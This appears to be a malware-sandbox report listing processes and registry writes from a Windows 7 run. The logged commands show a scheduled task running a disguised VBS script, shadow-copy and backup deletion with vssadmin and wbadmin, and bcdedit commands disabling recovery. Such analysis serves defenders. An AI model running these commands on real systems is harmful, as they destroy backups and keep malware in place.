"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 11 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
320
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set cdxxcsh bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1580
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set cdxxcsh recoveryenabled no
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2644
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbadmin.exe

PID
2832
CMD
bcdedit /set cdxxcsh bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
2788
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1968
CMD
bcdedit /set cdxxcsh recoveryenabled no
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3032
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete backup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
260
CMD
wbadmin delete catalog -quiet
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
792
CMD
"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\vssadmin.exe

PID
2388
CMD
wbadmin delete systemstatebackup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll

PID
2928
CMD
wbadmin delete backup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll

PID
2012
CMD
vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\vssadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
2940
CMD
"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -- ramst007.rar C:\Users\admin\Desktop\ramst007.mp3
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll

PID
2172
CMD
"C:\Program Files\Internet Explorer\iexplore.exe"
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\propsys.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mlang.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\naturallanguage6.dll
c:\windows\system32\nlsdata0009.dll
c:\windows\system32\nlslexicons0009.dll
c:\windows\system32\tquery.dll
c:\windows\system32\idstore.dll
c:\windows\system32\structuredquery.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\netprofm.dll

PID
2484
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2172 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\oleacc.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\uiautomationcore.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\winmm.dll
c:\windows\syswow64\imgutil.dll
c:\windows\syswow64\xmllite.dll
c:\windows\syswow64\windowscodecsext.dll
c:\windows\syswow64\msxml6.dll
c:\windows\syswow64\mfplat.dll
c:\windows\syswow64\avrt.dll
c:\windows\syswow64\uianimation.dll
c:\windows\syswow64\mshtmlmedia.dll
c:\windows\syswow64\mf.dll
c:\windows\syswow64\atl.dll
c:\windows\syswow64\ksuser.dll
c:\windows\syswow64\macromed\flash\flash32_27_0_0_187.ocx
c:\program files (x86)\common files\microsoft shared\ink\tiptsf.dll
c:\windows\syswow64\explorerframe.dll
c:\windows\syswow64\duser.dll
c:\windows\syswow64\dui70.dll
c:\windows\syswow64\ehstorshell.dll
c:\windows\syswow64\ntshrui.dll
c:\windows\syswow64\srvcli.dll
c:\windows\syswow64\cscapi.dll
c:\windows\syswow64\slc.dll
c:\windows\syswow64\imageres.dll
c:\windows\syswow64\msftedit.dll
c:\windows\syswow64\msls31.dll
c:\windows\syswow64\ntmarta.dll
c:\windows\syswow64\wldap32.dll
c:\windows\syswow64\structuredquery.dll
c:\windows\syswow64\actxprxy.dll
c:\windows\syswow64\thumbcache.dll
c:\windows\syswow64\searchfolder.dll
c:\windows\syswow64\shdocvw.dll
c:\windows\syswow64\networkexplorer.dll
c:\windows\syswow64\linkinfo.dll
c:\windows\syswow64\samcli.dll
c:\windows\syswow64\samlib.dll
c:\windows\syswow64\netutils.dll
c:\program files\ccleaner\ccleaner64.exe
c:\program files (x86)\adobe\acrobat reader dc\reader\acrord32.exe
c:\windows\installer\{ac76ba86-7ad7-ffff-7b44-ac0f074e4100}\sc_reader.ico
c:\program files\mozilla firefox\firefox.exe
c:\program files\videolan\vlc\vlc.exe
c:\program files (x86)\google\chrome\application\chrome.exe
c:\program files\opera x64\opera.dll
c:\program files\internet explorer\iexplore.exe
c:\program files\winrar\winrar.exe
c:\windows\syswow64\wshext.dll
c:\windows\syswow64\wscript.exe

PID
2996
CMD
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\New Text Document.txt
Path
C:\Windows\system32\NOTEPAD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Notepad
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\duser.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\xmllite.dll

Registry activity

Total events
2823
Read events
2575
Write events
248
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2104
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2064
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2064
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2064
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2064
powershell.exe
write
